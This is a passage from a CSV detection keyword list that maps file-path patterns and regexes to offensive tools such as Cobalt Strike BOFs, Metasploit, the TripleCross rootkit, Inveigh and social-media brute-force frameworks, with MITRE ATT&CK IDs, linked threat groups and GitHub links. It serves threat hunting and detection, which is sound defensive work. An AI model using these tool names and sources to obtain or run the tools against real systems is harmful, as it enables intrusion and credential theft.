"*/Injection/tooltip/*",".{0,1000}\/Injection\/tooltip\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","8082"
"*/Injection/uxsubclassinfo*",".{0,1000}\/Injection\/uxsubclassinfo.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","8083"
"*/injection_lib.so*",".{0,1000}\/injection_lib\.so.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","8084"
"*/Injections/SQL.txt*",".{0,1000}\/Injections\/SQL\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","8085"
"*/injectsu.exp*",".{0,1000}\/injectsu\.exp.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8086"
"*/injectsu.lib*",".{0,1000}\/injectsu\.lib.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8087"
"*/injectsu.pdb*",".{0,1000}\/injectsu\.pdb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8088"
"*/injectsu/*",".{0,1000}\/injectsu\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8089"
"*/inline_syscall.git*",".{0,1000}\/inline_syscall\.git.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","1","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","8090"
"*/inline_syscall/include/in_memory_init.hpp*",".{0,1000}\/inline_syscall\/include\/in_memory_init\.hpp.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","1","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","8091"
"*/inline-exec/*.exe",".{0,1000}\/inline\-exec\/.{0,1000}\.exe","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","8092"
"*/InlineWhispers*",".{0,1000}\/InlineWhispers.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/InlineWhispers","1","1","N/A","N/A","10","10","315","42","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z","8093"
"*/insta-bf.git*",".{0,1000}\/insta\-bf\.git.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/insta-bf","1","1","N/A","N/A","7","1","59","13","2024-04-23T02:47:28Z","2020-11-20T22:22:48Z","8094"
"*/instabf.py*",".{0,1000}\/instabf\.py.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/insta-bf","1","1","N/A","N/A","7","1","59","13","2024-04-23T02:47:28Z","2020-11-20T22:22:48Z","8095"
"*/instabrute.py*",".{0,1000}\/instabrute\.py.{0,1000}","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tool","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","N/A","8","741","263","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z","8096"
"*/instainsane.git*",".{0,1000}\/instainsane\.git.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/umeshshinde19/instainsane","1","1","N/A","N/A","7","7","655","371","2024-02-11T10:29:05Z","2018-12-02T22:48:11Z","8097"
"*/instainsane.sh*",".{0,1000}\/instainsane\.sh.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/umeshshinde19/instainsane","1","1","N/A","N/A","7","7","655","371","2024-02-11T10:29:05Z","2018-12-02T22:48:11Z","8098"
"*/install_elevated.py*",".{0,1000}\/install_elevated\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","8099"
"*/install_locutus.sh*",".{0,1000}\/install_locutus\.sh.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","8100"
"*/install-sb.sh*",".{0,1000}\/install\-sb\.sh.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","N/A","N/A","7","10","3581","391","2024-09-02T19:15:22Z","2019-03-28T18:07:05Z","8102"
"*/InstallStager.exe*",".{0,1000}\/InstallStager\.exe.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","1","N/A","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","8103"
"*/insTof.py*",".{0,1000}\/insTof\.py.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/insta-bf","1","1","N/A","N/A","7","1","59","13","2024-04-23T02:47:28Z","2020-11-20T22:22:48Z","8104"
"*/interactive_shell.py*",".{0,1000}\/interactive_shell\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","8105"
"*/Intercepter-NG*.apk*",".{0,1000}\/Intercepter\-NG.{0,1000}\.apk.{0,1000}","offensive_tool_keyword","Intercepter-NG","android wifi sniffer","T1433","TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/intercepter-ng","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8110"
"*/interesting-teamsmessages.csv*",".{0,1000}\/interesting\-teamsmessages\.csv.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","8111"
"*/internal/C2/*.go*",".{0,1000}\/internal\/C2\/.{0,1000}\.go.{0,1000}","offensive_tool_keyword","GC2-sheet","GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.","T1071.002 - T1560 - T1105","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/looCiprian/GC2-sheet","1","1","N/A","N/A","10","10","578","111","2025-03-28T19:48:36Z","2021-09-15T19:06:12Z","8112"
"*/InternalMonologue.exe*",".{0,1000}\/InternalMonologue\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","8113"
"*/Internals/Coff.cs*",".{0,1000}\/Internals\/Coff\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nettitude/RunOF","1","1","N/A","N/A","10","10","145","21","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z","8114"
"*/InternetConnect_x64_Release.exe*",".{0,1000}\/InternetConnect_x64_Release\.exe.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","8115"
"*/Intranet penetration.cna*",".{0,1000}\/Intranet\spenetration\.cna.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","8116"
"*/Inveigh.exe*",".{0,1000}\/Inveigh\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","8117"
"*/Inveigh.git*",".{0,1000}\/Inveigh\.git.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","ALLANITE - ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","N/A","10","10","2685","462","2024-08-06T01:47:27Z","2015-04-02T18:04:41Z","8118"
"*/Inveigh.ps1*",".{0,1000}\/Inveigh\.ps1.{0,1000}","offensive_tool_keyword","ADAPE-Script","Active Directory Assessment and Privilege Escalation Script","T1178 - T1087 - T1482","TA0002 - TA0004 - TA0007","N/A","Black Basta","Privilege Escalation","https://github.com/cjoan75/ADAPE-Script","1","1","N/A","N/A","8","1","0","0","2020-07-11T00:53:24Z","2020-08-09T16:52:35Z","8119"
"*/Inveigh.ps1*",".{0,1000}\/Inveigh\.ps1.{0,1000}","offensive_tool_keyword","Inveigh","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","8120"
"*/Inveigh.ps1*",".{0,1000}\/Inveigh\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","8121"
"*/Inveigh.ps1*",".{0,1000}\/Inveigh\.ps1.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","Inveigh","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","8122"
